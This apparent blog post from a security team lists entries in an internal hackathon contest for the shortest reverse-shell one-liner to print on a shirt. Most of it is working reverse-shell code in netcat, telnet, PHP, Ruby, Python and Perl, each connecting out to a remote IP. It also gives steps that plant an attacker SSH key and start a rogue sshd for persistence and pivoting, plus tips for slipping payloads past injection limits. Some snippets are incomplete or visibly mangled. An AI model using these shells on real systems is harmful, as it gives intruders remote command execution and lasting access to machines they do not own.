For our internal hackathon, we wanted to produce some shirts. We ran a competition to see who could produce a reverse shell invocation most worthy of inclusion on a shirt. Here are the submissions, which may be instructive or useful. But first; the winning t-shirt design goes to Vlad (-islav, baby don’t hurt me, don’t hurt me, no more):
Funny story; the printer left out the decimal points between the IP, so we had to use a permanent marker to put them back. Oh, also, many of these were originally taken from somewhere else then modified, we don’t claim the full idea as our own. Anyway, onto the shells!
Netcat – 18 chars
nc -e sh 126.96.36.199 1
Requires nc with -e support (unlikely to be on remote box by default).
Bash – 27 chars
Requires bash with /dev/tcp support, not always there (e.g. RHEL). Vlad’s winning contribution.
Telnet – 37 chars
mkfifo x&&telnet 188.8.131.52 8 0<x|sh 1>x
Will work on most systems, can replace telnet with nc to get 33 chars.
PHP – 56 chars
<?php $s=fsockopen(“184.108.40.206”,8);exec(“sh<&3>&3 2>&3”);?>
Requires PHP CLI. This one from Rogan.
Ruby – 73 chars
exec sprintf(“sh<&%d>&%d 2>&%d”,f,f,f)
Need to invoke this with
ruby -rsocket small-rev.rb
which is a bit of a cheat for size. This was also taken from pentestmonkey
Python – 155 chars
import socket as x,os s=x.socket(2,1) s.connect(("220.127.116.11",8)) d=os.dup2 f=s.fileno() d(f,0) d(f,1) os.system("sh")
This assumes you use unix line breaks. My personal favourite.
Perl – 121 chars
$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"18.104.22.168:8");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
perl -MIO small-rev.pl
Elf – 133 chars
This actually uses 127.0.0.1 8080 as the IP unlike the others, and the IP didn’t affect char count. Obviously this would only work on a system that supports ELF executables.
/usr/bin/ssh-keygen -t rsa -f /tmp/sshd_rsa -N “”
/bin/bash -c “mkdir /home/.ssh”
echo ‘ssh-rsa =’ > /home/user/.ssh/authorized_keys;
chmod -R 700 /home/user/.ssh;
/usr/sbin/sshd -f /dev/null -h /tmp/sshd_rsa -p
We stopped counting size here. This one is useful if you don’t want to upload any tools to the box, don’t know the password of the user you’re targeting and want all the port forwarding goodness of SSH for pivoting too.
This nifty one was put together by gcp, and uses the Perl pack command to convert a hex representation of the bash /dev/tcp shell above. It includes Perl’s funky qw.. trick to avoid special chars, and is chunked up to bypass small injection points. Use xxd with the -ps and -c switches to generate a new one.
Using Python for a PTY
nc hackme.com 80 -e python -c ‘import pty; pty.spawn(“/bin/bash”)’
Gary showed us this trick a while ago, and it’s been ever useful. Using python to spawn a decent-ish pty.